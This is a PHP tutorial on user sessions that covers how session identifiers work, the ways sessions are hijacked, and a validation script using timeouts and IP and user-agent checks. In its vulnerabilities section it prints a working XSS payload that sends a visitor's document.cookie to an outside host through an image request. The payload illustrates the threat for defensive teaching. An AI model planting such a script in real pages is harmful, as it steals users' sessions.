Validating PHP User Sessions

What are Sessions for?

Before we start digging into how to manage user sessions, it is important to first understand what sessions are for. In a nutshell, sessions are the way that we “maintain state” from one page to the next, that is, how we identify specific users across multiple page requests. Being able to track users as they move from page to page gives us a number of options, such as recording where they go (web statistics) or verifying their credentials for a restricted section of the site.
Let’s say that a user comes to your site and goes to page foo.php. On foo.php there is the ability to customize the page so that it only displays the information that the user wants to see, which we’ll assume is done via some handy JavaScript/DHTML. The user follows the instructions and modifies the page to match what s/he wants to view every day. The next day the user comes back to find that all the work that s/he did was in vain, because the page was unable to maintain the choices after the user left the page.
Clearly the above example would frustrate most users, and they would not want to keep coming back to your site. To let the user make changes that persist, we need two things: a way to store the user’s choices (most likely a database), and a way to identify unique users so that we can tell user A from user B when both are logged in simultaneously. That second part is where sessions come into play. When a user comes to the site, we give them a unique identifier (a session id) that distinguishes them from every other user on the site. So, when the user logs in and then modifies their choices for foo.php, we know whose profile to save those changes to.

How do Sessions Work?

A session works by assigning a unique identifier to a user when they come to the site. A good session identifier needs enough random characters that a person cannot guess it and a program cannot find it quickly by trial and error. Generally speaking, a session identifier should be at least 32 random alphanumeric characters, though for the sake of brevity our session identifier in this article will be XYZ.
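To make the length guideline concrete, here is a minimal sketch of producing a 32-character random identifier. The function name generateSessionToken() is hypothetical and is not part of PHP's session API. PHP's own session_start() generates its identifier internally, so this is only needed if you write a custom session script. It assumes PHP 7 or later for random_bytes().

```php
<?php
// Hypothetical helper (not part of PHP's session API): build a random,
// hard-to-guess identifier from a cryptographically secure source.
function generateSessionToken(int $bytes = 16): string
{
    // random_bytes() draws from the operating system's secure generator;
    // bin2hex() doubles the length, so 16 bytes become 32 hex characters.
    return bin2hex(random_bytes($bytes));
}

$token = generateSessionToken();
echo strlen($token), "\n"; // 32
```

Hexadecimal output uses only the characters 0-9 and a-f, so a longer token (for example 32 bytes, giving 64 characters) is a reasonable choice if you want more margin.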
Unfortunately, since the web has no inherent way of maintaining state, assigning a unique identifier isn’t as simple as it sounds. We need a way for this session identifier to be passed to every page that the user visits. There are two primary ways that session identifiers get passed along to subsequent pages. The first is URL rewriting, which appends ?PHPSESSID=XYZ to the end of every link on a page. This has the advantage of being usable by all web users since it merely modifies the links, but it has disadvantages too: the identifier can easily be lost when the user navigates with the back button, and URL rewriting has some security vulnerabilities that will be discussed later. The other primary way of passing the session identifier is by using cookies, which the browser stores on the user’s computer without the user seeing them. Cookies have the advantage that they can be kept either until the browser window is closed or until a specified date (for “remember me” functions). The negative aspect of cookies is that, while most users have cookies enabled, some choose to disable that feature.
Fortunately, for those who don’t want the hassle of figuring all of this out for a custom session management script, PHP makes session management very easy. In order to initiate a session, all you have to do is call session_start() before outputting anything to the browser. When session_start() is called, PHP will automatically create the session if one doesn’t exist, or read the session that already exists, and it will handle the URL rewriting and/or cookie setting internally. Using PHP’s built-in sessions will reduce your flexibility for things like “remember me” functions, but it is also a much easier way to start learning how sessions work.
Once a session is created, you can create variables in PHP’s superglobal array, $_SESSION, as simply as you would create any other variable. Those variables are then stored on the web server (by default in a file), not on the client’s computer, so the user cannot modify them directly. Below is an example of how easy it can be to store information in a session. On the first page load there is no session, so the script creates one and sets the variables for name and e-mail. If the page is then reloaded, it outputs the values that were set on the first page load:
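<?php
// Must be called before any output is sent to the browser.
session_start();

if( isset($_SESSION['name']) ) {
  // Later loads: the values come from the server-side session store.
  // htmlspecialchars() keeps the angle brackets around the e-mail visible
  // instead of letting the browser treat them as an HTML tag.
  echo(htmlspecialchars(
        "Hello {$_SESSION['name']} <{$_SESSION['email']}>"));
}
else {
  // First load: no session data yet, so store it.
  $_SESSION['name']   = "John Doe";
  $_SESSION['email']  = "john.doe@mysite.com";
  echo("Session created, refresh page");
}
?>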

Session Vulnerabilities

Unfortunately, while PHP makes it easy to create sessions, there are many ways for session security to be compromised. Probably the easiest way to compromise a session is through URL rewriting. Since URL rewriting puts the session identifier directly into the URL, an unwary user who copies and pastes his or her URL and sends it to other people will inadvertently give away the session. Also, if the site links to external sites, the session identifier may show up in referrer logs on the other site. For these reasons, it is generally considered safer to use cookies.
Another simple way that sessions can be compromised is when users are on public computers. When using cookies, there is the potential that the cookie could be left on the computer after the user is finished, leaving an open door. Alternatively, if URL rewriting is used, the next person at the computer could take over the session simply by browsing through the history. The risk arises when the user doesn’t manually click “logout”, or closes the browser thinking that doing so will automatically log him or her out. In that situation the session stays exposed if URL rewriting is used, if the cookie has an expiration time instead of ending when the browser window closes, and particularly if the session doesn’t time out within a short amount of time.
The most creative way that I have seen sessions compromised, however, generally happens on bulletin boards and similar sites that display user-submitted HTML (an attack commonly called cross-site scripting, or XSS). A hacker will register on the site, and then make posts in various places on the site that allow HTML input. Within those posts, s/he will include some JavaScript that inserts an image tag whose address is actually a link to an application that harvests cookie data. It looks similar to the following:
<script type='text/javascript'>
  document.write("<img src='http://site.com/url.php?cookie="+
    document.cookie+"' />");
</script>
In the above script, the hacker is putting the JavaScript “document.cookie” into the URL. So, when the user’s browser parses the JavaScript and attempts to load the image, it also sends along the viewing user’s cookie information, which compromises that user’s session. The hacker can then, at his or her leisure, go through the list of session identifiers hoping to find someone with admin access, etc., in order to hack the site.
Beyond all of the above, there are more active hackers: those who write programs that continually try to brute-force their way into a system by trying random session identifiers, and those who are able to gain access to network traffic and read anything that is not encrypted, thereby potentially gaining access to all session data being passed to a site. I doubt that most websites will ever have to worry about these kinds of attacks unless they become high-profile sites. Nonetheless, it is good to know the possibilities. They make clear that some precautions are needed beyond blindly accepting the session identifier, and those precautions are discussed next.

Session Security

First of all, because of the public computer risk, your design should be such that the logout button is always visible when logged in, so that the user can easily log out at any time. Your PHP configuration options (or custom script) should be set so that sessions time out after approximately 20 minutes of inactivity. If you are on shared hosting without access to the PHP configuration options, and sessions don’t time out after 20 minutes or so, then you should store the “last access time” in the session itself and destroy the session if it is accessed after too long a period of inactivity. Also, if you manually set a cookie (using a custom script), you should set it so that it is destroyed when the browser window is closed rather than on an expiration date (PHP’s session_start() sets the cookie this way by default). If you do need to set an expiration date, such as for a “remember me” function, it should not be set by default. Use it only when the user explicitly checks a box that says “remember me”, since only the user knows whether or not they are on a public computer.
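As a rough illustration of the manual “last access time” check described above, the sketch below isolates the comparison in a small function. The name isSessionExpired() and the default of 1200 seconds (20 minutes) are assumptions chosen for this example, not PHP built-ins.

```php
<?php
// Hypothetical helper: true when more than $maxIdle seconds have passed
// since the last recorded access. 1200 seconds is the 20 minutes used above.
function isSessionExpired(int $lastAccess, int $now, int $maxIdle = 1200): bool
{
    return ($now - $lastAccess) > $maxIdle;
}

// Usage sketch inside a page, after session_start():
// if (isset($_SESSION['last_access'])
//     && isSessionExpired($_SESSION['last_access'], time())) {
//     session_unset();
//     session_destroy();
// } else {
//     $_SESSION['last_access'] = time(); // refresh on every valid request
// }
```

Passing the current time in as a parameter, rather than calling time() inside the function, is a design choice that makes the check easy to test with fixed values.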
Secondly, in order to protect your session as much as possible, you need to find as many unique aspects of the user’s computer as you can, and verify that they stay the same across all page requests. The most common security precaution here is to verify that the IP address stays the same. It is possible that a hacker could be at the same IP address as the valid user, or perhaps could even spoof the IP address, but it is less likely. However, depending on your needs for security versus ease of use, and whether or not you need sessions to span hours or days (for “remember me” functions), you need to balance this against the fact that a user’s IP address can change during a session, particularly with large dial-up providers like AOL. This means that the valid user may get bumped. For this reason, applications like the open source phpBB bulletin board only verify the first 6 characters of the IP address by default, to make it less likely that a user will get bumped by an ISP-generated IP change.
It would be nice if every browser sent out a unique 32-64 character id to identify itself, one that JavaScript would not be allowed to access, so that the only hackers who could get through would be the ones able to listen to the site’s traffic. Until that time, the next best thing that I have found, and which I use in my own code, is to verify that the user maintains the same user-agent across all page requests. The user-agent string varies with the browser, version, and operating system, especially in IE. It is entirely possible for a hacker to have the same user-agent, or to spoof it if they know what it is, so this check is clearly not even close to being bullet-proof. However, it is one extra step that can be taken to help keep hackers out, and combined with an IP check, it makes it just a tiny bit less likely for someone to get through.
Finally, one of the most important things is to validate user input so that hackers can’t compromise your sessions using JavaScript. If you have a site that allows users to fill out forms to enter text onto the site, you should, if at all possible, avoid allowing HTML to be entered into the forms. You can either strip out all HTML tags using the strip_tags() function built into PHP, or you can convert HTML markup characters to their entity equivalents (e.g. < becomes &lt;), which can also be done easily using the htmlentities() function built into PHP. If you must allow HTML, then you should make sure that event handlers and <script> tags are not allowed into the content, which requires more difficult parsing.
Now, it is important to know that even with all of the above, the site is still not “safe”. For one, unless you are using SSL on the site, the session identifier, the IP address, and the user-agent are all being sent to the server in plain text. This means that a capable hacker who can listen to the server traffic will still be able to capture them and take over a session fairly easily. If the data you are protecting is important, then your best course of action is to enable SSL on the server, on top of taking all the previously mentioned precautions, so that all data exchange is encrypted.
Below is a simplified example of doing a manual timeout as well as verifying the IP address and user-agent to validate a session. I recommend that, if the credentials don’t match, you immediately destroy the session so that the hacker can’t keep trying different things after finding a valid session identifier. This will also log out the valid user, but the trade-off is worthwhile.
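One caveat with comparing a fixed number of characters of a dotted IPv4 string: the same character count covers a different share of the address depending on how many digits each part has. For example, 192.168.1.1 and 192.169.1.1 share the same first 6 characters. The sketch below shows one possible alternative, comparing whole dot-separated parts instead. The function sameIpPrefix() and its default of two parts are assumptions for illustration, and the sketch does not handle IPv6 addresses.

```php
<?php
// Hypothetical helper: compare the first $octets dot-separated parts of two
// IPv4 addresses. Addresses with fewer parts (e.g. IPv6) never match here.
function sameIpPrefix(string $a, string $b, int $octets = 2): bool
{
    $partsA = array_slice(explode('.', $a), 0, $octets);
    $partsB = array_slice(explode('.', $b), 0, $octets);
    return count($partsA) === $octets && $partsA === $partsB;
}

var_dump(sameIpPrefix('192.168.10.5', '192.168.77.9')); // bool(true)
var_dump(sameIpPrefix('10.1.2.3', '10.11.2.3'));        // bool(false)
```

How many parts to compare is the same security versus ease-of-use trade-off discussed above: more parts means a stricter check and a higher chance of bumping a valid user.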
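Here is a short sketch of the two options just mentioned, applied to a made-up forum post. The sample string and variable names are assumptions for illustration. The ENT_QUOTES flag is added so that quote characters are converted as well.

```php
<?php
// Untrusted input, e.g. a forum post submitted by a user (made-up sample).
$post = "<script>alert('x')</script><b>Hi</b>";

// Option 1: remove the tags entirely; the text between them remains.
$stripped = strip_tags($post);
echo $stripped, "\n";

// Option 2: keep everything, but convert markup characters to entities so
// the browser displays them as text instead of interpreting them.
$escaped = htmlentities($post, ENT_QUOTES, 'UTF-8');
echo $escaped, "\n";
```

Note that strip_tags() leaves the script's text content in place (only the tags go away), so which option fits better depends on whether you want the user's original characters to remain visible.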

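<?php
session_start();

// unset all session variables, destroy the session, and stop the script
function destroySession($p_strMessage) {
	session_unset();
	session_destroy();
	echo($p_strMessage);
	exit;
}

// the user-agent header is optional, so fall back to an empty string
$strUserAgent = isset($_SERVER['HTTP_USER_AGENT'])
	? $_SERVER['HTTP_USER_AGENT'] : '';

if( isset($_SESSION['name']) ) {
	// verify first 6 chars of IP
	if( substr($_SESSION['ip_address'],0,6)
	    != substr($_SERVER['REMOTE_ADDR'],0,6) ) {
		destroySession("Invalid IP Address");
	}
	// verify user-agent is same
	elseif( $_SESSION['user_agent'] !== $strUserAgent ) {
		destroySession("Invalid User-Agent");
	}
	// verify access within 20 min (1200 seconds)
	elseif( (time()-1200) > $_SESSION['last_access'] ) {
		destroySession("Session Timed Out");
	}
	// valid session
	else {
		// record this request so the timeout measures inactivity,
		// not time since the session was created
		$_SESSION['last_access'] = time();
		// escape values for HTML; session_id() also works when the
		// identifier is not carried in the PHPSESSID cookie
		echo("Logged In<br /><br />
		Hello " . htmlspecialchars($_SESSION['name']) . "
		&lt;" . htmlspecialchars($_SESSION['email']) . "&gt;
		Session ID: " . htmlspecialchars(session_id()));
	}
}
else {
	// first load: store the user data and the values to validate against
	$_SESSION['name']		= "John Doe";
	$_SESSION['email']		= "john.doe@mysite.com";
	$_SESSION['ip_address']	= $_SERVER['REMOTE_ADDR'];
	$_SESSION['user_agent']	= $strUserAgent;
	$_SESSION['last_access']	= time();
	echo("Session created, refresh page");
}
?>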

Conclusion

In the above script, we are again storing the information on the first page load, and then validating it and outputting it on subsequent loads. To make this script useful, you must validate the user’s login before assigning any of the user’s data to the session. If the login is valid, store the user id that you need to identify that user’s session, along with any values that you want quick access to during script operation. As you have hopefully seen, PHP makes session handling very easy.
Unfortunately, in many cases, you may want more flexibility than what PHP offers by default--such as the ability to have “remember me” functions--but this requires that you set up your own way to store information (generally a database), which then requires that you set up additional algorithms to control when and how sessions get deleted, etc. However, that is going to have to wait for a later article. In the meantime, learning to use PHP sessions will set you up to understand better what you will need in order to develop your own session management application.